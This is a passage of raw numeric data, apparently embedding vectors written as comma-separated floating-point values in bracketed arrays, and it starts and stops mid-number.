0072330874,0.018611869,-0.016060766,-0.006061087,-0.007826273,0.010847288,0.0024662663,-0.014967063,0.0033936948,0.017445823,0.0006336293,0.005613051,0.014185399,0.00086299225,0.003919822,-0.0044020847,0.012893038,-0.014431445,-0.0059874724,-0.0008184705,0.013758951,-0.021440836,0.022539163,-0.0055629024,0.019547177,-0.0021653927,0.00776819,0.013265499,-0.016515406,-0.0057010395,-0.008185763,-0.015956813,-0.008422686,0.012610667,-0.0011740307,0.0077191032,0.019790398,0.000077553625,-0.0008171009,-0.06827961,0.028596446,0.024334868,0.010691967,0.008362974,-0.012084049,-0.0042522214,-0.0059049902,-0.0059144376,0.00064181664,0.0071869455,-0.007941052,0.003798801,0.004468423,0.007481198,-0.023926023,0.0053058947,0.029152652,0.000705213,0.004810096,-0.00062914356,0.016962474,-0.0017648865,0.011896873,0.0009601241,-0.018045064,0.019936258,-0.00028512595,0.0048733503,-0.0022601038,0.00005787075,-0.010664163,0.011931008,-0.018948104,0.045757193,-0.025850601,-0.035085477,-0.004563154,0.00081027433,0.014026075,-0.01272497,0.0104647055,-0.028703326,-0.012260496,-0.0079225,-0.005636698,0.0021485786,-0.00032439953,-0.0027113296,-0.006359513,-0.036499795,-0.009501295,0.0068329205,-0.02469231,-0.029983586,-0.0112087885,0.009589655,-0.0030528654,-0.0129509065,-0.011416483,-0.011915972,0.013439552,0.0048094555,-0.01646864,0.0171254,0.021930423,-0.021766989,-0.029329725,0.009260231,0.0026229238,-0.01736038,-0.018634371,-0.0034047177,0.021414272,0.01708898,0.011368854,0.015284443,-0.008331165,0.01657985,0.014960668,0.0042532654,-0.012194177,0.008024927,-0.021119876,-0.012923377,-0.001162168,-0.018965675,-0.022638725,-0.012940633,-0.021877212,-0.02249124,-0.036751676,-0.014756733,-0.010521045,0.018763464,0.023421824,-0.011005567,-0.0068142824,0.020719787,-0.004839102,0.02299647,-0.003957346,-0.017258476,-0.0015924688,-0.014656738,-0.0029412839,0.008107062,0.0008463178,0.025273783,0.0041666646,0.010906915,-0.0007677038,0.009201995,-0.004688203,-0.0066773375,-0.005109509,-0.017962385,0.021189122,-0.02295491,-0.0008098106,-0.012348376,0.00047840195,0.014117254,-0.007850626,0.02520011,0.044957925,-0.06268083,-0.016262343,0.012742597,-0.0042332923,-0.020424854,0.02261906,-0.007167132,-0.042934895,-0.033840235,0.008514561,0.008158243,-0.027281566,-0.032454662,-0.017681686,0.013252302,-0.013147694,-0.0032933634,0.0033221513,-0.009121578,-0.003902671,0.016307436,0.001832414,-0.0023827,0.00025633068,0.001548292,-0.010303325,-0.0003601987,0.0059249606,-0.013338616,0.001638888,-0.006142794,0.0050793802,-0.0145068355,0.006022813,-0.0028504108,-0.012468121,0.023838844,-0.004137659,-0.011149151,-0.024413044,-0.012225778,0.0013559293,0.0010569046,0.0023442782,-0.019507147,-0.015273728,0.020687195,0.007826158,0.14670971,-0.0073225936,-0.0063454327,-0.0012876864,0.0006932493,-0.008257433,0.0012215095,0.02610662,0.0022971157,0.0014456415,0.020527273,-0.007895333,0.009954448,0.02903172,-0.01053877,0.01804054,0.0027370434,0.13544163,0.005859533,0.029784324,0.015027538,0.004568533,-0.0012882856,0.007701772,0.011797493,-0.065127715,0.009800089,-0.036091603,-0.004416836,0.014362932,-0.03609498,0.021157704,-0.0004182539,0.0052721826,-0.01322096,-0.00010267788,0.0067752106,-0.012608707,-0.03774247,-0.01030645,0.018887926,-0.015499993,-0.018276548,0.0087247975,-0.0038128817,-0.0063343747,-0.038776908,0.015846137,-0.00015648633,0.019891884,0.008230727,-0.013266398,0.019903632,0.0029602044,0.0064331032,0.023649877,0.009415664,-0.0033938647,-0.04113123,0.019750226,-0.004675216,0.0051804637,-0.00784297,0.030719452,-0.004669713,-0.010138835,-0.0037802705,0.0036949655,0.0036345304,0.012501811,0.030759448,0.022887548,-0.013687057,-0.0053457366,0.038013283,0.0046626157,-0.012786444,0.008387659,0.021021849,0.0003962523,0.03621263,0.014432111,-0.009510035,0.010582303,0.013215518,0.013813118,0.015802598,0.011468384,0.004312534,0.006064007,0.00018749136,0.008845196,-0.0128854,0.021224182,0.008366824,0.021396372,-0.0024448521,-0.0068048956,0.011729723,-0.021013325,-0.0012946677,0.022110619,0.003688008,-0.011201288,-0.00815197,0.007956148,-0.009421045,-0.03087261,-0.0049305814,0.0026165016,0.021742823,0.014407683,-0.0041708853,0.017260183,0.0009968948,-0.009258223,-0.014938528,-0.0049204165,-0.027318489,0.003822928,0.008458853,-0.0059284703,-0.0008741389,0.0055052903,-0.027901864,0.0017760502,0.012268682,0.01974856,-0.019050295,-0.0038753506,-0.027043553,-0.0015366887,0.0053092856,0.059353266,-0.0000964551,-0.011584583,0.024418209,-0.025418308,-0.023041861,0.010190676,0.00090254395,-0.0018511646,0.0054707825,0.004390701,0.0040828655,-0.012453188,0.011482207,-0.0030696057],[0.01072997,0.002714901,-0.018446498,-0.026601672,0.010009191,-0.02593478,0.007909317,0.019874902,-0.0032927615,-0.0101524815,-0.005357954,0.009748079,0.0087708,0.0035565617,-0.0046222634,0.00473407,0.001378262,0.015600922,0.007391308,-0.020285176,0.0005423922,-0.004567536,0.015590734,-0.0040753298,0.0046198685,0.0053610043,0.0048353127,0.005747431,0.015231922,0.011292818,0.0057474305,0.020075448,-0.011298082,0.0037908116,0.003749516,0.014442168,-0.020664457,-0.01872939,0.015408831,-0.009503381,-0.0024053364,0.018496918,-0.0010661571,0.03420425,0.009033088,0.011918821,-0.027701396,0.011453255,-0.013004355,0.011671663,0.012107153,0.0049758987,-0.037898067,0.019759562,-0.0019062714,0.01488385,0.012659563,-0.042356472,-0.003374094,-0.016896801,-0.0071896496,-0.0025881196,0.020773925,-0.017714702,0.023429632,-0.0038311398,-0.0119364755,-0.04320503,0.004806112,-0.009088164,0.015184486,-0.007693492,0.0024822033,-0.0030760875,0.026845928,0.0063089444,-0.004107932,-0.009558244,-0.018904865,0.005729159,-0.027730362,0.010542271,0.0020571023,-0.010136264,0.0023905283,0.025609732,0.002479022,-0.012921523,-0.017507873,-0.011867605,0.019443648,0.014631871,0.02771185,0.0065992833,-0.014506211,0.01209712,0.010522415,-0.0135042025,-0.008186073,0.016608594,0.012282291,-0.0055775396,-0.026816884,0.014343205,-0.00715597,-0.013457695,-0.0024528543,-0.002817805,-0.008391039,-0.013629058,0.0037218817,0.00054692983,0.008088063,0.02272741,0.0011037173,-0.009063855,0.0016061703,0.007215101,0.009733033,0.002684602,0.015215535,0.0061380793,0.0069916723,-0.0023760982,-0.018834015,0.0008546369,-0.014141476,0.02695039,-0.009100821,-0.0005490711,-0.006660052,0.015082264,-0.00281207,-0.0042626797,-0.0007605565,-0.002753483,0.011623016,0.010415195,0.0046868585,0.010848656,0.027665805,-0.004915244,-0.0074423384,0.018209908,-0.00443093,0.015425345,0.002105679,0.009477881,0.01451654,-0.026491994,0.015160769,-0.00736219,0.011088678,0.004234502,0.00004375055,0.01883518,0.003998646,-0.015774418,-0.0058708778,-0.0037284472,0.0069755088,-0.0032600504,0.004866119,0.0019017254,-0.008215977,-0.027708145,-0.007752732,-0.013290702,-0.01776094,-0.0028557205,0.019117389,0.035488434,0.018995922,-0.005150809,0.006639871,0.013976773,-0.011911169,-0.008382351,0.006151321,-0.014671951,0.004590144,0.0034342916,-0.011868474,-0.017260171,-0.020408582,0.030766176,0.01198703,0.0016789038,-0.0064872913,-0.01321005,-0.009614838,-0.024263293,0.007893558,0.00087685586,-0.018150143,-0.021298919,-0.016683152,0.0823223,-0.011034257,0.0036297694,-0.00790906,0.01189862,0.019298086,-0.03575376,-0.014200025,0.0054149516,0.004052537,0.000114741706,0.018734952,-0.0029482855,0.0190099,-0.0057328846,-0.009018528,0.004916164,0.0024380835,-0.068044536,0.036995463,0.012550596,0.00707394,0.0013406927,-0.020984387,0.007993386,-0.00045190583,0.010280956,-0.010021344,-0.0153932525,-0.0040192544,0.009790712,-0.005161312,-0.042793937,0.0025220804,0.00195738,-0.0116659785,-0.027632186,0.01604897,-0.0057607014,0.007182197,-0.0045576114,-0.008045201,0.0055283112,-0.010897169,0.012336033,0.02487806,0.013683105,0.013868123,0.011283986,0.006051224,-0.013721874,0.004614999,0.026813552,-0.008107073,0.012154501,0.005969377,0.032989044,-0.0053794654,-0.026926447,0.00795342,-0.008436621,0.010948295,-0.0014854086,0.04495675,0.01398346,-0.016418878,0.011052548,0.026812818,-0.0025463926,0.0028374044,-0.0373736,-0.0096917385,0.0044134906,-0.01720496,0.0045867213,0.0082220435,-0.0016026656,0.00405047,-0.02741337,0.023051415,0.0038590643,-0.019019557,0.0031004758,-0.0007314124,0.014710422,0.008177088,-0.0206808,0.008832012,0.022943445,0.0055446145,0.013116991,0.037094414,-0.017132057,-0.00008293093,-0.007922199,0.026757443,-0.008565628,-0.005005671,0.01865417,-0.015885977,0.026318438,0.021955293,-0.017790234,0.0015693811,0.014549334,-0.0028187602,-0.0028305433,-0.0034120728,-0.010961689,-0.027828258,0.013527086,-0.011338595,0.008682565,-0.055425294,-0.010543009,-0.001219365,0.0125653455,-0.0011295805,0.018762227,-0.016459763,0.003830811,-0.020332145,-0.008355691,-0.008356276,-0.0239892,0.015397131,-0.017513985,-0.018415825,0.001029194,0.014494163,-0.027916461,0.018090457,0.010287149,0.012450816,0.007969076,0.009900089,0.016458334,-0.017619899,0.018141972,-0.0017885433,0.033837378,0.0062299357,-0.021730429,-0.028590057,-0.009512223,0.0067966604,0.0045126127,-0.008215375,-0.0078086522,0.011066703,-0.0047374973,0.016895236,-0.00214744,0.011593322,-0.02895869,-0.0075348495,-0.00546254,-0.044234335,-0.009095181,-0.007502976,0.00088239554,-0.00832011,-0.015888553,0.031147555,-0.010797009,-0.00062560895,0.0049390723,0.09658483,0.02416336,-0.012154001,0.007454643,0.004246388,0.0012384676,0.024265228,-0.002550143,0.004081572,0.0051558167,-0.020534383,0.004726486,0.0038565418,0.020963538,-0.0043201195,-0.018267408,-0.020788047,-0.023381332,-0.041572876,-0.025144814,0.012345347,-0.00048851344,-0.02219751,0.003009637,0.022716248,0.021219863,0.023094054,-0.0089365905,-0.0016887046,-0.015901139,0.00076908036,0.025321292,0.015743129,0.021800093,-0.023992153,0.026576351,0.024085056,-0.011015895,-0.04156863,0.008437792,0.00008912929,0.0018360898,-0.012376156,-0.014124955,-0.0114134,0.053363644,-0.013606847,-0.00095677946,-0.010577094,0.02784613,0.008631581,0.0135418875,-0.012645077,0.005667631,0.002775862,0.0202996,0.008057419,-0.03904939,0.035657533,0.023808936,0.014560094,0.03602988,0.0050457246,-0.005958173,0.0017450316,0.018817507,-0.009492458,-0.016983582,-0.00981314,-0.004045949,0.005000171,-0.011458999,-0.004069571,0.0003578044,0.01915396,0.013033721,-0.004134898,-0.024441514,0.0030122173,0.044306077,-0.014408335,0.0028430035,0.00912009,0.01366772,-0.009083848,0.005273291,-0.0016423195,-0.008375341,0.018914279,-0.016410468,-0.0035585305,0.0063357423,0.024069246,0.0016922152,0.0032056863,0.014847042,0.0121924905,0.012261541,0.0035270916,-0.0047032954,0.014983737,0.006087617,0.014509379,-0.0175562,-0.00835451,-0.0019093541,0.010233043,-0.01078631,0.002734875,0.041263957,-0.033235908,0.0008797742,-0.0027069314,-0.024223275,0.00013309723,0.0019890557,-0.0070558726,-0.016323268,-0.0090752775,-0.00022726684,0.03295859,0.005930283,0.014047898,0.0027414125,0.011692513,0.0062117623,0.0037740814,-0.028529739,0.0002654393,0.027406476,0.0071786586,0.008831448,0.016119232,-0.03094905,0.025054852,0.012030803,-0.00074126147,-0.016430495,0.024129458,0.032200098,-0.010009072,0.021250356,0.019856093,-0.0031174545,0.008591001,0.033287954,0.047482718,-0.010444111,-0.010518602,-0.01089482,-0.0041067633,-0.011270793,0.03696724,-0.03500455,0.0009818472,0.0029587313,0.0216645,-0.008695656,-0.009830106,0.0043344116,0.028710647,-0.032613385,-0.0016235802,0.011866949,0.00018881906,0.013164808,-0.00026389444,0.054183796,-0.011769248,-0.027743421,-0.02741199,0.032493923,0.006568068,-0.012034017,-0.0012225371,-0.014374392,-0.011544812,-0.01829184,0.018918859,-0.015054269,-0.00064962066,-0.022627244,-0.002486511,-0.017382422,0.00069617166,-0.02740246,0.0075210105,-0.0026446725,-0.0055782716,-0.023856102,-0.027629914,-0.027460784,0.030740943,0.02465399,0.0041340236,-0.021476813,-0.0078080725,-0.022316644,0.005022449,0.009483242,-0.011803705,-0.008046099,0.0045721894,0.0031284261,-0.0032563899,-0.008379447,0.03667362,-0.018754208,-0.0081213,0.0004281264,0.022620218,0.022127463,0.02112546,-0.011428442,0.028193539,0.030551609,0.00022799405,0.015344948,0.021829085,0.01808963,0.013155057,-0.0071900943,0.0026835264,0.012757565,0.0060957586,-0.02886043,0.011364425,0.011097637,0.0035496496,-0.030613765,-0.0074402974,-0.024772378,-0.015415316,0.019117033,-0.00018997658,-0.006470096,-0.035185408,-0.016032575,0.0014412832,0.016590262,-0.016728291,0.0087329615,0.025555091,0.0005930027,0.012203179,0.01392594,0.005531063,0.014910972,0.009557771,-0.0069297226,0.0021654468,0.012384063,0.010043277,-0.011859926,0.0010031486,0.008786263,0.0010928296,-0.005969223,-0.022874909,0.027435241,0.009246571,0.040154405,-0.014451644,0.008453195,-0.02111433,0.0026365558,-0.0055344976,-0.030735238,-0.003241861,-0.0091519635,0.017976021,-0.0055084527,0.014456138,0.0053243274,-0.0092410995,-0.0070211673,-0.0019129987,0.026658136,-0.041968416,-0.008670146,-0.004722273,0.0033784313,-0.00716147,0.026706163,0.0061797313,0.012420469,-0.0050915335,-0.0076612243,0.002587345,-0.0025549564,-0.006278986,0.0051740645,0.0063967295,-0.010032494,-0.031603042,-0.012414938,-0.00034746752,-0.05138449,-0.006292769,0.041291304,0.02242656,0.014845718,0.014922229,0.0051666736,0.0047102817,-0.015438224,0.019221677,-0.047284186,0.020214977,0.0044399933,-0.031929653,0.024755664,0.007538047,0.0053359927,-0.0019954771,-0.023487296,0.00616967,0.008299178,-0.00018133591,-0.013195924,-0.008699695,0.020494554,-0.010139672,0.02021244,-0.0146227665,0.01439431,0.017637735,0.025896424,0.003369785,0.003979638,-0.005178922,-0.0012404463,-0.018588914,0.009954783,0.01420618,0.03062022,0.01196259,0.009915513,-0.007952402,-0.010291452,0.013448242,-0.006844382,0.005499451,0.030216997,0.030264702,0.013819028,0.022068212,-0.004637543,0.022194628,-0.007258253,-0.0064200913,-0.012506455,0.006623177,0.033367287,0.0018583521,0.011867347,-0.006332054,0.020624902,-0.0033651975,-0.006824632,-0.01612037,0.031158762,0.03447115,-0.00059247535,0.029855566,0.019103527,-0.008623347,-0.008753855,-0.0033286905,-0.029072132,-0.00077040965,-0.026927607,0.030065635,-0.022423578,-0.0017731857,-0.049079236,0.02424972,0.0144068375,0.01048846,-0.0177152,-0.027535716,-0.00045555524,0.000985854,-0.01876206,-0.04298369,-0.051079866,-0.016755005,0.025465582,-0.036359757,0.01202087,0.006924832,-0.0075739836,-0.0043201633,0.028603911,0.00049911486,-0.026565183,0.010657599,-0.012085273,0.033737812,0.02126782,0.02001673,-0.0038632723,0.0046914415,-0.0068638907,-0.0084518045,-0.016097592,0.0045099435,0.008193734,0.016770065,0.022950137,-0.013977139,-0.0029865147,-0.020351753,-0.014731331,0.0033981837,-0.024411928,-0.014996008,-0.013892369,-0.0025475011,-0.008314688,0.004073406,-0.022974022,0.029843142,0.008858761,-0.02156482,0.002974716,0.010254946,0.0048253546,0.023874106,0.038727116,-0.008023636,-0.036788855,-0.005561782,0.019741204,0.0005885984,0.014560873,-0.0013789857,-0.028017504,-0.020225931,-0.009886744,-0.005910331,-0.019577948,0.010677229,0.012505944,-0.04425349,0.03095945,-0.010855952,0.018294945,0.02430142,0.030566365,0.006065167,-0.0031195648,0.013935762,-0.03162759,0.010586092,0.0079020085,-0.00012509574,-0.009519024,0.015884032,-0.028354341,0.0010836216,-0.034263954,-0.0029259608,-0.010738284,0.011739462,-0.0061301026,-0.0009464084,-0.01377493,0.016922565,-0.0070655076,-0.0037925104,-0.026939914,-0.009341125,0.00784046,0.0007209278,0.013189113,0.010654332,-0.010490816,0.0427827,-0.0075399755,-0.0068484913,0.011652996,0.0004958519,-0.00476718,-0.003066182,-0.005463645,0.0006853015,-0.015015595,0.030054912,-0.03591352,0.0029330985,0.039561667,0.008440161,-0.012972278,-0.013150045,-0.038599208,-0.01749511,-0.003394149,0.008642446,-0.02495341,0.008023912,0.00473478,-0.029821407,0.0060965326,0.006210855,0.03426376,0.0037782742,0.0029977614,0.020992378,0.0012467798,-0.021588441,-0.004781758,-0.012625346,-0.00035668118,-0.008494481,-0.005998798,-0.006638632,0.0042962935,0.03359768,0.011446697,0.005528503,0.013505391,-0.0045121894,0.0043301666,-0.010607685,0.016843267,-0.005978825,0.0068120514,0.022461798,-0.022829223,-0.0108116055,-0.010454897,-0.004558331,-0.014874683,-0.045780636,-0.0074752322,-0.019001327,0.0059138974,0.027879259,0.0040580663,0.01594382,-0.007045141,-0.0064524096,-0.011664744,0.01003052,0.017419638,0.012751572,-0.0028431967,-0.0031461262,0.019034524,-0.010585582,0.002220249,0.0067643416,-0.0063260235,0.01644249,-0.012639166,-0.010160504,0.009344153,-0.012246999,0.024761131,0.02578458,0.004039407,0.0063616945,-0.0110668205,-0.023249315,0.017186057,-0.008077095,0.021730734,-0.011961598,0.025011607,0.01731642,-0.029272867,-0.025549907,-0.01209195,-0.05435603,0.040578734,0.020566719,0.01927339,-0.0003231428,0.0063859387,0.0027911817,-0.0023402937,0.010317019,-0.020428598,-0.0054556285,-0.00503717,-0.00095106,0.0052284743,0.0069150957,0.019098401,-0.021824699,0.013819044,0.0131394565,0.0064322837,0.00828545,0.006137666,0.010012536,-0.010125213,0.027606728,0.013563237,0.0042066732,-0.0030388176,-0.035242625,0.021069333,0.0023382832,-0.0042326096,-0.0035341184,-0.010989744,-0.014804463,0.00027845308,0.0036684028,0.012224397,-0.007986872,0.017292226,-0.011269557,-0.018787034,-0.01585932,0.032835357,-0.018461954,-0.03374633,-0.0025466448,-0.008785936,0.009265209,0.007935637,0.038293492,-0.002935104,-0.0141079305,0.0092753265,0.008862972,0.027669808,-0.02585505,0.02278673,0.013457454,-0.01130155,0.019003024,-0.022012325,0.0060796374,0.023860702,-0.022385612,0.0039046032,-0.015084076,0.032778323,0.009995735,-0.005123396,-0.012226014,-0.013463836,-0.012352496,0.017066259,-0.015795173,0.029888611,-0.020049747,-0.0006075492,-0.007628028,-0.038186207,-0.009525704,-0.0074017737,-0.021119216,-0.009503321,-0.016611883,-0.012790087,0.0073945294,-0.007976091,-0.0024881787,-0.022255793,-0.013508905,0.005561149,-0.003937119,-0.010072706,-0.0077989097,0.017938571,0.002890497,0.0036151605,0.0057238513,0.0065118885,0.015289489,-0.016517613,-0.0076254434,0.03233486,0.009221316,0.00075005216,-0.0056962674,0.015287192,0.010876727,0.014473848,0.013024065,0.024878966,-0.012027913,-0.0035891768,0.015302916,0.0072400407,-0.004646607,0.0022134786,0.03680323,0.01681082,-0.002388134,-0.0038324543,0.015902402,0.0034229376,0.005159044,0.02201862,0.012098459,0.0112478295,-0.03271775,0.026941791,-0.01756846,0.02438996,0.038805798,-0.0040392717,0.032622647,0.016982075,0.008167727,0.0048840465,-0.00968078,-0.0094266,-0.009590019,-0.008872383,-0.005699111,-0.00045795907,0.014907807,0.007988043,0.011034709,0.016751574,0.003765085,-0.010647958,0.014267611,-0.013468011,-0.008557245,-0.012817563,-0.012631138,-0.005767628,-0.0038129017,-0.0058670426,-0.00003365648,0.01389123,-0.00045557384,-0.033048544,-0.00015905433,-0.0038304043,-0.033865087,-0.005242824,-0.004497102,0.00017817364,-0.022327572,-0.003107644,-0.006723126,0.02083978,-0.015733065,0.03198671,-0.011967045,0.004017823,0.04734621,0.017359518,-0.004967638,-0.009496601,0.0014398535,0.0055992166,0.012184801,-0.0015579502,-0.010735756,-0.004746038,0.000037064925,-0.00096443575,-0.02251964,-0.01583246,0.0025924994,0.011971789,-0.0004648057,-0.006802935,-0.009883943,0.036637433,-0.015841968,0.010683562,0.0064768647,0.006957347,-0.005208185,0.03192635,0.013368759,0.007840177,-0.008210325,-0.017018408,0.008229121,-0.022619627,-0.00043452237,-0.0037140956,0.00026619065,0.013786428,-0.025895495,-0.030877389,-0.01669135,0.01147282,0.004351535,0.008741851,0.022116031,-0.018657742,0.021551915,0.0057599344,0.0018198197,0.010085516,0.002504369,-0.020523207,0.04243656,0.011993291,-0.005024307,-0.01053303,0.016020603,-0.010056275,0.018594598,0.027686523,-0.023204815,0.007645831,0.0010011188,0.012098033,-0.00409341,-0.007031615,0.016493134,0.021179046,0.009581222,-0.014106916,-0.01747764,0.019147988,0.0033127135,0.0058172615,0.0065526348,0.025824735,0.0054435935,0.0043279123,0.0035783474,0.0064608175,-0.018627206,-0.0030461138,-0.007552236,-0.016529713,-0.00016731537,-0.019483555,-0.014749852,-0.0016786745,-0.016990613,-0.006534152,-0.0056696874,0.011663498,0.0061818883,0.033240315,0.017453507,0.021442605,-0.0036053413,-0.013658413,-0.006292451,0.006989874,-0.008695235,0.0011559781,-0.010150697,-0.000687262,0.0086912075,0.022054903,-0.004345333,-0.0060038483,0.00071242417,-0.040865406,0.01383449,0.008138093,-0.013789004,-0.016934242,0.009615937,0.0052680746,-0.016379511,-0.017818747,0.0017140768,0.013546206,-0.0027249441,0.0011492047,-0.010977593,0.0037337975,-0.0032026623,-0.032014493,0.072090335,0.0031058653,0.0076293554,-0.0075054863,0.024237137,-0.021556627,0.0175767,-0.009149839,0.005623204,-0.02548029,-0.030459687,-0.020266045,-0.0053989664,-0.02442796,0.023848208,0.0068603605,0.0100492705,0.01525999,-0.013646481,0.011521259,0.0007186706,-0.0064138337,0.002314602,0.00006677626,0.0053139892,0.011698149,0.026618022,-0.01034584,0.015157376,-0.019400211,-0.010390992,-0.022337187,0.044995863,0.00091231096,-0.020048864,0.014407982,0.012247602,-0.006201702,-0.013640478,0.006537518,0.0061015673,-0.02114497,0.03070262,0.007620845,-0.011526486,-0.015377812,-0.010015399,-0.004008974,0.014122307,-0.022190537,-0.010062253,-0.00036412888,-0.030394878,0.0065467535,-0.0054964405,0.013065269,0.0006356609,-0.003266932,0.018706141,-0.0044349045,0.013502762,-0.0005403661,0.009060803,0.003493802,-0.01318356,0.0016739959,0.013993997,-0.021106137,-0.003832607,-0.010296184,0.012894454,-0.003948888,-0.008204651,0.0147195235,-0.00012678087,-0.011418598,0.023617486,0.008077022,0.02387733,-0.010987968,-0.012396246,0.007970411,0.030490316,-0.0010688844,-0.023441954,0.0075685596,-0.02247453,0.00897572,0.04759003,0.016811606,0.00837636,-0.0024617752,0.013936843,0.013665057,0.022068707,0.020457301,0.0027044741,0.0011407457,-0.005230196,-0.002760435,-0.0032841088,0.0012649931,0.021441357,0.0013527209,0.025974512,0.0027595316,-0.00347504,-0.018273653,0.007618089,0.0191726,0.017753223,0.007867918,-0.012861727,-0.004419034,-0.011858161,-0.0041561816,0.024986306,0.0020097569,-0.01462092,-0.010839418,0.0074993777,0.0051074894,-0.028900998,-0.05382686,0.0030089614,0.16323748,0.011676969,-0.0239282,0.029442178,0.008242815,0.0047549754,-0.08538883,0.016844623,0.0069363317,-0.007484985,-0.005007225,-0.015845727,-0.0031304923,0.020122806,-0.0014895679,-0.007401836,-0.009035007,-0.017667683,0.0010310968,-0.013903115,-0.0066732406,0.002626065,-0.0105701145,-0.0039613983,-0.030888647,-0.0066060084,-0.0035204052,-0.0026764031,0.0015046224,-0.016285418,-0.0029198863,-0.0110997325,0.018867826,-0.004918792,-0.018606361,0.007816797,0.017937316,0.014347387,-0.007662992,0.024782076,0.041823845,0.02712652,0.0023738868,-0.028723773,-0.14813784,0.015653087,0.00033045403,-0.021813923,0.03197399,-0.010602249,0.0004589669,-0.0040285466,0.03668253,-0.025343485,-0.0023101019,0.011975278,0.0047295704,0.027058188,-0.0017306961,-0.0068308376,0.00011293398,0.0007074163,-0.017281776,-0.027807426,0.0020303386,-0.004760866,0.006500824,-0.03747977,-0.03505052,0.0003989328,-0.0016334427,0.023437336,-0.028040925,0.0020143671,-0.005242405,0.016368907,-0.014098681,-0.0023346709,-0.009024046,-0.024737397,-0.0036745449,0.007803895,-0.0015267713,0.0176426,-0.010899091,0.0042964765,-0.008377594,0.0135222245,-0.0026747698,0.0044828514,-0.0027821735,0.012661589,0.026441287,0.0110738985,-0.0008612926,0.015398627,-0.016613873,-0.0060590026,0.0123408325,0.014345124,0.009094964,-0.0026552053,-0.020253746,-0.0011537755,-0.017675856,-0.025660245,0.0032890618,-0.0024098987,0.041574385,-0.008949328,0.032211684,-0.020863065,-0.0024161907,0.016474472,-0.002664911,0.0032113644,-0.00029790748,-0.02103981,0.01999723,0.012816778,-0.018546496,-0.00052591047,0.0073718103,-0.022884343,-0.013775849,0.00868336,-0.0030366513,-0.011546918,0.0012180485,0.0027854051,0.00025006916,0.017856097,-0.0115418425,-0.016686374,0.012814718,-0.00594066,0.025454298,-0.00708495,0.022979667,-0.0015864536,0.039472796,-0.017193744,-0.022645833,0.010869939,0.0044617625,-0.022140747,-0.018979011,0.011695861,0.017480783,0.001190597,0.012093815,-0.020806376,-0.026140388,-0.006565083,-0.02908773,-0.004351594,0.032495417,-0.00081202714,-0.02268336,-0.02472994,0.0006780359,-0.018677535,0.022619128,0.007313192,-0.020445593,0.015399035,-0.006903323,0.013694468,0.030381387,0.027201504,-0.025508175,-0.008769298,0.0033512716,0.02559717,-0.029481864,-0.0018729287,-0.015105756,0.016306955,-0.028182412,0.009004084,-0.016945906,-0.009562625,-0.034409944,0.003392667,0.009516852,-0.0018612994,0.005417519,0.004839526,0.0011612517,-0.007858225,0.027798425,-0.0009196533,0.015174361,-0.012892104,0.013306736,0.019944914,-0.030306663,-0.019554608,0.000253335,0.07046594,-0.013829091,-0.02496936,0.0032152745,-0.0011468038,0.013000318,0.009234844,-0.018794486,-0.0015299992,0.008793353,-0.018005913,-0.015408636,-0.013376228,-0.024773344,-0.02816177,0.005412436,0.0072100647,0.03342629,0.016258817,-0.010834805,0.003402778,0.0006238221,0.0000149418,0.013025625,-0.0008516889,0.018534772,-0.0015663896,0.030565001,0.0058851647,-0.0024713895,-0.0016303033,-0.008071957,-0.0000872648,-0.0069730263,0.015984569,-0.036235787,0.012036934,0.017978666,0.007774751,-0.012052794,0.004963173,0.026835995,0.0034599034,-0.004741833,-0.009422375,-0.010126711,-0.015357075,0.0062888935,0.012342373,-0.016441695,0.019347994,0.00311654,0.0108163385,0.00605789,-0.01578738,0.0032968444,0.0023372155,0.0013735612,0.011663919,-0.01407981,0.032322343,-0.0065277596,-0.024791516,-0.01568055,-0.012345766,0.0033047928,-0.01030078,0.0050153006,0.0126557425,0.009466621,-0.014159504,0.008142575,0.00015151329,0.011455742,-0.009209327,0.0050367755,-0.0030378008,0.0024452067,0.0007097404,0.0108657535,0.004070448,0.014795373,0.007894434,-0.0020536906,-0.0245497,-0.05580616,-0.009326991,0.026118618,-0.0046702204,0.0058055725,-0.0019412191,-0.0038813942,0.017325012,-0.0095211165,0.0057863705,-0.0011822438,0.021010477,0.013252858,0.033662826,-0.014983065,0.005848574,-0.00853294,0.009799723,-0.025371257,-0.011387831,-0.03209899,0.013716795,-0.022839004,0.010506658,-0.011345083,0.0049045105,-0.006503679,0.0072373026,-0.018030267,-0.019794904,0.022139184,-0.004757171,-0.014739135,0.017280947,-0.0044892067,-0.015407157,0.0015768941,-0.008737605,0.00015385555,0.007773118,-0.02251978,0.00525257,-0.00041452947,-0.0052844575,0.020541498,0.010529955,0.032777037,0.0029918384,-0.010782959,-0.017319098,-0.0070016477,0.004007302,0.002665955,-0.0158971,0.021703264,-0.02528231,-0.026844297,0.0070037823,0.0022810453,0.0048517953,0.008203269,0.0006034777,-0.009180603,-0.011254952,-0.0030413878,-0.010590374,0.00332383,0.0014087964,0.00036801762,0.0065934137,-0.0016223965,-0.0049744924,-0.009831276,-0.018991206,0.0065481467,0.0018650653,0.015934657,0.019190192,0.0047412943,-0.010090196,0.02495448,0.03148406,-0.011287844,0.022286367,0.0026735866,0.011230062,-0.013182244,0.013540004,-0.005604556,0.008998982,-0.013105528,0.016953645,0.031142766,-0.012333755,-0.021949317,0.022947375,0.012323602,-0.0025886518,-0.025316691,-0.00894586,-0.0014665262,-0.012487461,0.029063229,-0.0017411873,-0.016421748,-0.01784999,-0.003056113,-0.010909555,-0.023667686,-0.019597448,0.0018628193,0.01189977,-0.024812374,-0.0007202737,0.017108187,-0.001990021,0.0207223,-0.022517756,-0.012960603,-0.008592878,0.020009177,0.017936442,-0.0059726057,0.008729089,0.0043915673,-0.0023271646,0.0015393108,-0.020193478,0.009086378,-0.02127622,-0.013695504,-0.0245937,0.02065961,-0.00076718646,-0.04375411,0.0137992585,-0.020091813,-0.009819795,-0.006968997,0.030817607,-0.02001257,-0.008139567,0.054639358,-0.0031420046,-0.016284822,0.0031121394,0.0199514,0.01794706,0.0084513575,0.00021764085,-0.028071526,0.008905504,-0.022890147,-0.030791977,0.018116185,0.018760514,-0.022029765,-0.014024846,0.004373886,-0.010251848,-0.0138534475,-0.01982958,0.023460524,0.010280957,0.038504142,0.0018475099,-0.016494261,-0.047244396,0.002594996,0.006689859,-0.020901285,0.010341348,0.025382647,-0.00915225,-0.008191896,0.002856691,-0.014975518,-0.0021745241,-0.0053612078,0.011981466,0.021594936,0.009099637,0.0036526031,0.00241591,0.0040606353,0.001033058,-0.0012644766,-0.0059872475,0.013621518,-0.005254459,0.0027499672,-0.005082541,0.00074855436,-0.011365211,0.036621448,0.017363625,-0.02812554,0.0076843877,0.006823513,-0.014716145,-0.012323739,0.0041570584,0.019826807,-0.003803395,-0.022300273,-0.014523319,0.